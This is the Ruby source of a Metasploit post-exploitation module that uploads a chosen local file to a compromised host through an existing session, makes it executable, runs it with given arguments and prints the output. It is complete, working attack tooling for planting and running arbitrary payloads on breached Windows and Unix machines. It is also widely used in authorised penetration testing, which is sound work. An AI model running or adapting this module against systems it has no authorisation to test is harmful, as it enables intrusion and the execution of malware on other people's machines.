Path: blob/master/modules/post/multi/manage/upload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that copies a local file to the host behind an existing session,
# runs it there and prints whatever the command returns.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  # Registers the module metadata and its four options.
  #
  # The 'Notes' entry declares the module's footprint: it is marked crash-safe,
  # and it lists ARTIFACTS_ON_DISK and IOC_IN_LOGS as side effects, i.e. a run
  # is expected to leave a file on the host and traces in its logs.
  def initialize(info = {})
    metadata = {
      'Name' => 'Upload and Execute',
      'Description' => %q{Push a file and execute it.},
      'Author' => 'egypt',
      'License' => MSF_LICENSE,
      'Platform' => ['win', 'unix', 'linux', 'osx', 'bsd', 'solaris'],
      'SessionTypes' => ['meterpreter', 'shell'],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
        'Reliability' => []
      }
    }
    super(update_info(info, metadata))

    options = [
      OptPath.new('LPATH', [true, 'Local file path to upload and execute']),
      OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']),
      OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']),
      OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 60])
    ]
    register_options(options)
  end

  # Uploads LPATH to RPATH, registers the uploaded file for cleanup, executes it
  # with ARGS under TIMEOUT, and prints the command output (or a notice when
  # there is none).
  def run
    remote = rpath

    print_status("Uploading #{lpath} to #{remote}")
    upload_file(remote, lpath)
    # Hand the path to the FileDropper mixin so the on-disk artifact is queued
    # for removal.
    register_file_for_cleanup(remote)

    command =
      if session.platform == 'windows'
        # Run the file directly rather than through `cmd.exe /c start`, so that
        # its output can be fetched.
        remote
      else
        # Mode 700: only the owning account may read, write or execute the file.
        chmod(remote, 0o700)

        # An absolute path is used as given; anything else is prefixed with
        # "./" so it is run from the current directory.
        remote.start_with?('/') ? remote : "./#{remote}"
      end

    print_status("Executing command: #{command}")
    result = cmd_exec(command, args, timeout)

    return print_status('Command returned no output') if result.blank?

    print_line(result)
  end

  # Local path of the file to upload (LPATH option).
  def lpath
    datastore['LPATH']
  end

  # Remote destination path: the RPATH option when set, otherwise the basename
  # of LPATH.
  def rpath
    configured = datastore['RPATH']
    return File.basename(lpath) if configured.blank?

    configured
  end

  # Command-line arguments handed to the uploaded file (ARGS option).
  def args
    datastore['ARGS']
  end

  # Timeout passed to cmd_exec for the command (TIMEOUT option).
  def timeout
    datastore['TIMEOUT']
  end
end